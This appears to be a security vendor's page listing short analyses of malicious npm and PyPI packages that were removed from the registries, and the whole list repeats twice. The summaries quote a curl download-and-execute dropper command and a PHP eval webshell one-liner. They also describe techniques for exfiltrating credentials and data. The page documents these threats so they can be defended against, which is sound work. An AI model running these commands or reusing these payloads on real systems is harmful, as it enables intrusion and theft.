Secure your dependencies. Ship with confidence.

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

The code poses a security risk and should be reviewed carefully before use. The lack of input sanitization poses a potential vulnerability, and the script sends data to an external server without clear justification.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

This source code is a malicious exploit script designed to remotely install a PHP webshell (vvv<?php eval($_POST[zzz]);?>) on a target web server by delivering an eval-wrapped, chr()-encoded payload via the HTTP User-Agent header and then verifying installation. Despite syntactic errors in the provided fragment, the intent, payload, and delivery mechanism are clear. Do not run this code; treat any occurrences as a high-risk compromise indicator and remove/report accordingly.

This file contains functionality to access email accounts and extract Instagram one-time verification codes, including a hardcoded plaintext credential. It logs and prints sensitive email subjects and contents without redaction. The module is capable of harvesting high-value authentication tokens (OTPs). Even though no explicit remote exfiltration is present in this snippet, the presence of hardcoded secrets and OTP harvesting logic makes this code dangerous and likely malicious in intent or at least a severe security/privacy risk. Do not run this code on sensitive accounts; remove hardcoded credentials and OTP-extraction logic, and ensure all logging of sensitive content is eliminated or redacted.

The assembly contains heavy obfuscation and a runtime loader that decrypts embedded data and performs unmanaged memory allocation, memory writes, protection changes and delegate creation/invocation. These operations enable in-memory code execution and process injection. Combined with hardcoded symmetric keys and anti-tamper/expiry checks, this is high-risk behavior for a library distributed on package managers. Even if intended as a legitimate protector/packer, it is not appropriate for a public dependency because it can execute arbitrary native payloads. Recommend blocking or sandbox analysis and replacing with a non-obfuscated, auditable implementation.

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

This script is highly suspicious and likely malicious, as it creates persistent PowerShell scripts that monitor the user's clipboard and post certain types of data to a web server. The script could be used for data theft or other malicious purposes.

Live on npm for 5 days, 2 hours and 26 minutes before removal. Socket users were protected even while the package was live.

This script is a high-risk abuse tool: it assembles and posts full credit card data (PAN, expiry, CVV) and billing details to arbitrary WooCommerce sites using PayPal Pro Payflow fields. It prints sensitive data to stdout and contains hardcoded fake billing info to facilitate automated checkouts. There are no classic malware constructs, but its behavior strongly facilitates payment fraud. Do not run with real card data or on shared systems. Treat as malicious/abusive in operational contexts and remove or quarantine in dependency audits unless you have an explicit, legitimate testing authorization.

This module implements a cloud-sync feature that explicitly exfiltrates local provider connections and API keys to a hardcoded third-party domain (https://9router.com) and can update a local CLI settings file (~/.claude/settings.json) based on remote state and the incoming request host header. These behaviors are high-risk: uploading secrets to an external service and modifying user home files without visible consent are security-sensitive operations. If the remote service is untrusted, compromised, or the host header is attacker-controlled, this introduces a serious supply-chain/security risk. Recommend immediate review before enabling: validate the remote domain ownership/trustworthiness, require explicit user consent/opt-in, add safeguards (limit which fields are sent, encrypt secrets, validate host header), and avoid blindly overwriting user home config.

The code exhibits clear malicious behavior by downloading and executing an executable from a remote server without proper verification, potentially leading to unauthorized remote access, cryptojacking, or other malicious activities. The high confidence, malware, and security risk scores are justified based on the identified behavior in the code.

Live on npm for 47 minutes before removal. Socket users were protected even while the package was live.

The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.

The script collects information like hostname, home directory, and current directory and sends it to a custom DNS server through DNS requests.

The code contains suspicious behavior by sending detected secrets to an external Zapier webhook, which poses a significant privacy and security risk. While no direct malware or obfuscation is present, this data exfiltration-like behavior warrants a high security risk score and a moderate to high malware suspicion score. The reports provided are invalid and do not reflect these findings.

This assembly contains heavy obfuscation, embedded encrypted resources and runtime unpacking/patching logic that reads resources/files, decrypts them and writes/executing code in process memory via native APIs and JIT/Reflection. Those behaviors are high-risk: they enable arbitrary in-memory code execution and tamper-resistant payload delivery. That pattern is commonly used by protectors/DRM but is also frequently abused by malware and supply-chain attackers. Treat this package as dangerous for most software supply chains unless you can validate the embedded resource contents and the publisher's intent. Immediate steps: isolate and reverse the embedded resource(s) in a safe sandbox, and require vendor/source verification before trusting the binary in production.

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.

The code is a malicious backdoor that exfiltrates sensitive system information and public IP address to an attacker-controlled domain via DNS queries. This represents a high security risk and clear malware behavior. The code is not heavily obfuscated but uses shell command chaining to hide its intent. It should be considered dangerous and avoided.

The code is heavily obfuscated, suggesting an attempt to conceal malicious activities. It logs sensitive authentication information ('base64EncodedAuthInfo') to the console, posing a risk of credential exposure. Additionally, it makes network requests using Axios to fetch content from an external URL ('hxxps://telegra[.]ph/file/f3b0b4e681583334b7330.jpg'), raising concerns about data exfiltration or the downloading of malicious content. The combination of logging sensitive data and connecting to external domains indicates that the code may be designed to steal data or compromise user security.

Live on npm for 7 hours and 5 minutes before removal. Socket users were protected even while the package was live.

This module contains high-risk behavior: hardcoded SSH credentials and automatic execution of commands loaded from an external YAML file that get evaluated and sent to a remote shell. While there is no clear, explicit obfuscation or direct evidence of an immediate malicious payload in the code itself, the combination of embedded credentials and unvalidated remote command execution is dangerous and could be used for unauthorized remote control, data exfiltration, or other supply-chain abuse. Recommend treating this package as unsafe until credentials are removed, command sources are validated, and explicit confirmation/authorization is added before any remote actions.

This script appears to be a controlled file distribution mechanism that requires a simple passcode. The hardcoded credentials, downloading of an unknown RAR file, and writing directly to the user's desktop without proper verification pose significant security risks. This could potentially be used to distribute malware or unauthorized content.

Live on PyPI for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

The package contains a malicious preinstall script that kills an Office process and exfiltrates the resulting output to an external server. The test script also queries the same external host. This is high-risk and likely malicious; do not install or run this package on any machine you care about.

Live on npm for 1 day, 16 hours and 4 minutes before removal. Socket users were protected even while the package was live.

This code constructs and delivers complex PHP payloads that provide multiple arbitrary remote code-execution vectors, includes exploit code (use-after-free, ELF parsing) to escalate capabilities, and contains anti-forensic cleanup routines. It is offensive/exploit tooling or webshell management code and should be treated as malicious for any production use. Do not use this package against systems you do not own/authorize; it poses a high supply-chain and operational risk.

The code collects sensitive system information such as the MAC address and serial number and opens a persistent WebSocket connection to a remote server at ws://server.example.com. It transmits these identifiers via URL parameters and receives encoded commands from the server. These commands can include operations like setting passwords for remote access software, retrieving remote access IDs, restarting the system, and sending error logs back to the server. The use of subprocess calls to execute system commands without proper validation further increases the risk of unauthorized control and data leakage.

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

The code poses a security risk and should be reviewed carefully before use. The lack of input sanitization poses a potential vulnerability, and the script sends data to an external server without clear justification.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

This source code is a malicious exploit script designed to remotely install a PHP webshell (vvv<?php eval($_POST[zzz]);?>) on a target web server by delivering an eval-wrapped, chr()-encoded payload via the HTTP User-Agent header and then verifying installation. Despite syntactic errors in the provided fragment, the intent, payload, and delivery mechanism are clear. Do not run this code; treat any occurrences as a high-risk compromise indicator and remove/report accordingly.

This file contains functionality to access email accounts and extract Instagram one-time verification codes, including a hardcoded plaintext credential. It logs and prints sensitive email subjects and contents without redaction. The module is capable of harvesting high-value authentication tokens (OTPs). Even though no explicit remote exfiltration is present in this snippet, the presence of hardcoded secrets and OTP harvesting logic makes this code dangerous and likely malicious in intent or at least a severe security/privacy risk. Do not run this code on sensitive accounts; remove hardcoded credentials and OTP-extraction logic, and ensure all logging of sensitive content is eliminated or redacted.

The assembly contains heavy obfuscation and a runtime loader that decrypts embedded data and performs unmanaged memory allocation, memory writes, protection changes and delegate creation/invocation. These operations enable in-memory code execution and process injection. Combined with hardcoded symmetric keys and anti-tamper/expiry checks, this is high-risk behavior for a library distributed on package managers. Even if intended as a legitimate protector/packer, it is not appropriate for a public dependency because it can execute arbitrary native payloads. Recommend blocking or sandbox analysis and replacing with a non-obfuscated, auditable implementation.

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

This script is highly suspicious and likely malicious, as it creates persistent PowerShell scripts that monitor the user's clipboard and post certain types of data to a web server. The script could be used for data theft or other malicious purposes.

Live on npm for 5 days, 2 hours and 26 minutes before removal. Socket users were protected even while the package was live.

This script is a high-risk abuse tool: it assembles and posts full credit card data (PAN, expiry, CVV) and billing details to arbitrary WooCommerce sites using PayPal Pro Payflow fields. It prints sensitive data to stdout and contains hardcoded fake billing info to facilitate automated checkouts. There are no classic malware constructs, but its behavior strongly facilitates payment fraud. Do not run with real card data or on shared systems. Treat as malicious/abusive in operational contexts and remove or quarantine in dependency audits unless you have an explicit, legitimate testing authorization.

This module implements a cloud-sync feature that explicitly exfiltrates local provider connections and API keys to a hardcoded third-party domain (https://9router.com) and can update a local CLI settings file (~/.claude/settings.json) based on remote state and the incoming request host header. These behaviors are high-risk: uploading secrets to an external service and modifying user home files without visible consent are security-sensitive operations. If the remote service is untrusted, compromised, or the host header is attacker-controlled, this introduces a serious supply-chain/security risk. Recommend immediate review before enabling: validate the remote domain ownership/trustworthiness, require explicit user consent/opt-in, add safeguards (limit which fields are sent, encrypt secrets, validate host header), and avoid blindly overwriting user home config.

The code exhibits clear malicious behavior by downloading and executing an executable from a remote server without proper verification, potentially leading to unauthorized remote access, cryptojacking, or other malicious activities. The high confidence, malware, and security risk scores are justified based on the identified behavior in the code.

Live on npm for 47 minutes before removal. Socket users were protected even while the package was live.

The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.

The script collects information like hostname, home directory, and current directory and sends it to a custom DNS server through DNS requests.

The code contains suspicious behavior by sending detected secrets to an external Zapier webhook, which poses a significant privacy and security risk. While no direct malware or obfuscation is present, this data exfiltration-like behavior warrants a high security risk score and a moderate to high malware suspicion score. The reports provided are invalid and do not reflect these findings.

This assembly contains heavy obfuscation, embedded encrypted resources and runtime unpacking/patching logic that reads resources/files, decrypts them and writes/executing code in process memory via native APIs and JIT/Reflection. Those behaviors are high-risk: they enable arbitrary in-memory code execution and tamper-resistant payload delivery. That pattern is commonly used by protectors/DRM but is also frequently abused by malware and supply-chain attackers. Treat this package as dangerous for most software supply chains unless you can validate the embedded resource contents and the publisher's intent. Immediate steps: isolate and reverse the embedded resource(s) in a safe sandbox, and require vendor/source verification before trusting the binary in production.

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.

The code is a malicious backdoor that exfiltrates sensitive system information and public IP address to an attacker-controlled domain via DNS queries. This represents a high security risk and clear malware behavior. The code is not heavily obfuscated but uses shell command chaining to hide its intent. It should be considered dangerous and avoided.

The code is heavily obfuscated, suggesting an attempt to conceal malicious activities. It logs sensitive authentication information ('base64EncodedAuthInfo') to the console, posing a risk of credential exposure. Additionally, it makes network requests using Axios to fetch content from an external URL ('hxxps://telegra[.]ph/file/f3b0b4e681583334b7330.jpg'), raising concerns about data exfiltration or the downloading of malicious content. The combination of logging sensitive data and connecting to external domains indicates that the code may be designed to steal data or compromise user security.

Live on npm for 7 hours and 5 minutes before removal. Socket users were protected even while the package was live.

This module contains high-risk behavior: hardcoded SSH credentials and automatic execution of commands loaded from an external YAML file that get evaluated and sent to a remote shell. While there is no clear, explicit obfuscation or direct evidence of an immediate malicious payload in the code itself, the combination of embedded credentials and unvalidated remote command execution is dangerous and could be used for unauthorized remote control, data exfiltration, or other supply-chain abuse. Recommend treating this package as unsafe until credentials are removed, command sources are validated, and explicit confirmation/authorization is added before any remote actions.

This script appears to be a controlled file distribution mechanism that requires a simple passcode. The hardcoded credentials, downloading of an unknown RAR file, and writing directly to the user's desktop without proper verification pose significant security risks. This could potentially be used to distribute malware or unauthorized content.

Live on PyPI for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

The package contains a malicious preinstall script that kills an Office process and exfiltrates the resulting output to an external server. The test script also queries the same external host. This is high-risk and likely malicious; do not install or run this package on any machine you care about.

Live on npm for 1 day, 16 hours and 4 minutes before removal. Socket users were protected even while the package was live.

This code constructs and delivers complex PHP payloads that provide multiple arbitrary remote code-execution vectors, includes exploit code (use-after-free, ELF parsing) to escalate capabilities, and contains anti-forensic cleanup routines. It is offensive/exploit tooling or webshell management code and should be treated as malicious for any production use. Do not use this package against systems you do not own/authorize; it poses a high supply-chain and operational risk.

The code collects sensitive system information such as the MAC address and serial number and opens a persistent WebSocket connection to a remote server at ws://server.example.com. It transmits these identifiers via URL parameters and receives encoded commands from the server. These commands can include operations like setting passwords for remote access software, retrieving remote access IDs, restarting the system, and sending error logs back to the server. The use of subprocess calls to execute system commands without proper validation further increases the risk of unauthorized control and data leakage.